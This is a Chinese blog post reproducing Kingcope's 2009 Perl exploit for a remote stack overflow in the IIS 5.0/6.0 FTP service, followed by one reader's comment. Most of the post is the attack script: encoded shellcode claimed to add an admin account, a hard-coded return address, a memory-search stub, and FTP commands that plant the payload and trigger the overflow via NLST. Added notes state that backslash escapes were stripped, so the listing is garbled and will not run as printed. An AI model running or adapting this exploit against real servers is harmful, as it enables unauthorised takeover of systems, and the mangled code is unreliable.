
Microsoft IIS 5.0/6.0 FTP 服务远程堆栈溢出漏洞利用工具Exploit (win2k)

这两天 exploit 又多了起来，先来一个 Microsoft IIS 5.0/6.0 FTP 服务远程堆栈溢出漏洞利用工具 Exploit (win2k)。注意：这是 2009 年 8 月公开披露的历史漏洞利用代码，针对早已停止支持的 Windows 2000 / IIS 5.0，微软随后也发布了补丁；仅可在获得授权的测试环境中使用。

Microsoft IIS 5.0/6.0 FTP 服务远程堆栈溢出漏洞利用工具 Exploit (win2k) 代码（注意：博客排版丢失了代码中的反斜杠转义，例如 shellcode 里的 `x89` 原为 `\x89`，FTP 命令末尾的 `\r\n` 也被去掉了，`s/./,/gi` 原为 `s/\./,/g`；下面的清单只能作为阅读参考，不能直接运行）:

# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 - KEEP THIS 0DAY PRIV8
#
# NOTE(review): Historical, publicly disclosed exploit (milw0rm, 2009-08-31) for a
# stack overflow in the IIS FTP service's NLST handling. The target platform
# (Windows 2000 SP4 / IIS 5.0) is long out of support and Microsoft shipped a fix
# for this bug shortly after disclosure; look up the vendor advisory for the
# August 2009 IIS FTP NLST overflow before relying on any claim made here.
# Use only against systems you are authorised to test.
#
# NOTE(review): This listing was mangled when it was pasted into the blog -- every
# backslash escape has been stripped. "x89xe2..." was "\x89\xe2...", the trailing
# space after each FTP command was "\r\n", and the substitution applied to $locip
# was "s/\./,/g". As printed, the script is NOT the author's code and will not
# behave as the comments describe; treat it as a reading copy, not a runnable one.
#
# Flow, as visible below: fork(). The parent connects to port 21, logs in as
# anonymous, sends the 500-byte $v buffer five times via SITE (so a copy of the
# shellcode sits on the stack), creates and enters a directory, issues a PORT
# command pointing back at this host, then sends the oversized NLST argument
# that triggers the overflow. The child binds a TCP listener on a random port
# and echoes whatever the first connection sends it.

use IO::Socket;
$|=1;   # autoflush STDOUT so the server banners are printed as they arrive
#metasploit shellcode, adduser "winown:nwoniw"
# NOTE(review): the payload is an encoded (alphanumeric-looking) blob with a
# small decoder stub in front; the "adduser winown:nwoniw" effect is the author's
# claim and cannot be confirmed from these bytes alone.
$sc = "x89xe2xdaxdexd9x72xf4x5bx53x59x49x49x49x49" .
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" .
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
"x42x75x4ax49x4bx4cx4ax48x50x44x43x30x43x30" .
"x43x30x4cx4bx47x35x47x4cx4cx4bx43x4cx45x55" .
"x42x58x45x51x4ax4fx4cx4bx50x4fx45x48x4cx4b" .
"x51x4fx51x30x43x31x4ax4bx47x39x4cx4bx47x44" .
"x4cx4bx43x31x4ax4ex50x31x49x50x4cx59x4ex4c" .
"x4cx44x49x50x44x34x43x37x49x51x49x5ax44x4d" .
"x43x31x49x52x4ax4bx4cx34x47x4bx51x44x46x44" .
"x43x34x43x45x4ax45x4cx4bx51x4fx51x34x43x31" .
"x4ax4bx43x56x4cx4bx44x4cx50x4bx4cx4bx51x4f" .
"x45x4cx45x51x4ax4bx4cx4bx45x4cx4cx4bx45x51" .
"x4ax4bx4bx39x51x4cx46x44x44x44x48x43x51x4f" .
"x46x51x4cx36x43x50x50x56x45x34x4cx4bx50x46" .
"x50x30x4cx4bx47x30x44x4cx4cx4bx42x50x45x4c" .
"x4ex4dx4cx4bx42x48x45x58x4dx59x4ax58x4cx43" .
"x49x50x43x5ax46x30x43x58x4cx30x4cx4ax44x44" .
"x51x4fx43x58x4ax38x4bx4ex4dx5ax44x4ex50x57" .
"x4bx4fx4ax47x42x43x42x4dx45x34x46x4ex42x45" .
"x44x38x43x55x47x50x46x4fx45x33x47x50x42x4e" .
"x42x45x43x44x51x30x44x35x44x33x45x35x44x32" .
"x51x30x43x47x43x59x42x4ex42x4fx43x47x42x4e" .
"x51x30x42x4ex44x37x42x4fx42x4ex45x39x43x47" .
"x47x50x46x4fx51x51x50x44x47x34x51x30x46x46" .
"x51x36x51x30x42x4ex42x45x44x34x51x30x42x4c" .
"x42x4fx43x53x45x31x42x4cx42x47x43x42x42x4f" .
"x43x45x42x50x47x50x47x31x42x44x42x4dx45x39" .
"x42x4ex42x49x42x53x43x44x43x42x45x31x44x34" .
"x42x4fx43x42x43x43x47x50x42x57x45x39x42x4e" .
"x42x4fx42x57x42x4ex47x50x46x4fx47x31x51x54" .
"x51x54x43x30x41x41";
#1ca
# (author's size note: 0x1ca = 458, presumably the original shellcode length)
print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2 ";
# Exactly two arguments required: target host and the local IP the target
# should connect back to. ($#ARGV is numeric; `!=` would be the idiomatic
# comparison, `ne` works only because 1 stringifies the same way.)
if ($#ARGV ne 1) {
print "usage: iiz5.pl <target> <your local ip> ";
exit(0);
}
srand(time());
# Unprivileged listener port in the range 1025 .. 31339, chosen per run and
# embedded in the scratch directory name and the PORT command below.
$port = int(rand(31337-1022)) + 1025;
$locip = $ARGV[1];
# Intended to turn "a.b.c.d" into "a,b,c,d" for the PORT command. As printed
# (escape lost) this replaces EVERY character with a comma and the PORT line
# becomes garbage.
$locip =~ s/./,/gi;
# Parent (non-zero pid) runs the attack; child (pid 0) runs the listener.
# NOTE(review): fork() returning undef on failure is not handled and would
# send the parent down the listener branch.
if (fork()) {
# NOTE(review): a failed connect leaves $sock undef; nothing below checks it.
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '21',
                              Proto    => 'tcp');
# 4-byte filler value repeated across the overwritten stack region (target-
# specific address chosen by the author).
$patch = "x7ExF1xFAx7F";
#$retaddr = "ZZZZ";
# Saved-return-address overwrite: hard-coded JMP ESP, so this only works on
# the exact Win2k builds the author tested.
$retaddr = "x9BxB1xF4x77"; # JMP ESP univ on 2 win2k platforms
# 500-byte stage: 5-byte "KSEXY" marker, shellcode, then 'V' padding.
$v = "KSEXY" . $sc . "V" x (500-length($sc)-5);
# top address of stack frame where shellcode resides, is hardcoded inside this block
# Search stub: walks memory comparing each dword with "SEXY" (bytes 53 45 58 59
# are visible in the stub), then jumps just past the marker into $sc.
$findsc="xB8x55x55x52x55x35x55x55x55x55x40x81x38x53"
   ."x45x58x59x75xF7x40x40x40x40xFFxFFE0";
# attack buffer
# Layout: search stub, filler, $retaddr in the saved-EIP slot, then what
# appears to be a short backward near-jump (E9 rel32) to reach the stub once
# ESP points into this buffer. Offsets are specific to the vulnerable build.
$c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch.
   ($patch x (52/4)) .$patch."EEEE$retaddr".$patch.
   "HHHHIIII".
$patch."JKKK"."xE9x63xFExFFxFFxFFxFF"."NNNN";
# Banner, then anonymous login. Each response is printed but never checked,
# so a rejected login still proceeds to the trigger.
$x = <$sock>;
print $x;
print $sock "USER anonymous ";
$x = <$sock>;
print $x;
print $sock "PASS anonymous ";
$x = <$sock>;
print $x;
# Scratch directory; requires that anonymous has write access on the target.
print $sock "MKD w00t$port ";
$x = <$sock>;
print $x;
print $sock "SITE $v "; # We store shellcode in memory of process (stack)
$x = <$sock>;
print $x;
print $sock "SITE $v ";
$x = <$sock>;
print $x;
print $sock "SITE $v ";
$x = <$sock>;
print $x;
print $sock "SITE $v ";
$x = <$sock>;
print $x;
print $sock "SITE $v ";
$x = <$sock>;
print $x;
print $sock "CWD w00t$port ";
$x = <$sock>;
print $x;
print $sock "MKD CCC". "$c ";
$x = <$sock>;
print $x;
# Active-mode data connection back to the listener forked below.
print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . " ";
$x = <$sock>;
print $x;
# TRIGGER
# Oversized NLST glob containing the attack buffer.
print $sock "NLST $c*/../C*/ ";
$x = <$sock>;
print $x;
# Keeps the parent (and the socket) alive while the child waits; a busy spin
# that burns a core -- sleep or wait would do the same job.
while (1) {}
} else {
# Listener bound on ALL interfaces with no authentication: anyone who can
# reach this host can connect to the chosen port. Accepts one connection
# and echoes its lines to STDOUT.
my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1);
die "Could not create socket: $! " unless $servsock;
my $new_sock = $servsock->accept();
while(<$new_sock>) {
print $_;
}
close($servsock);
}
#Cheerio,
#
#Kingcope
#
#
milw0rm.com [2009-08-31]

Kevin
Kevin 什么语言啊  回复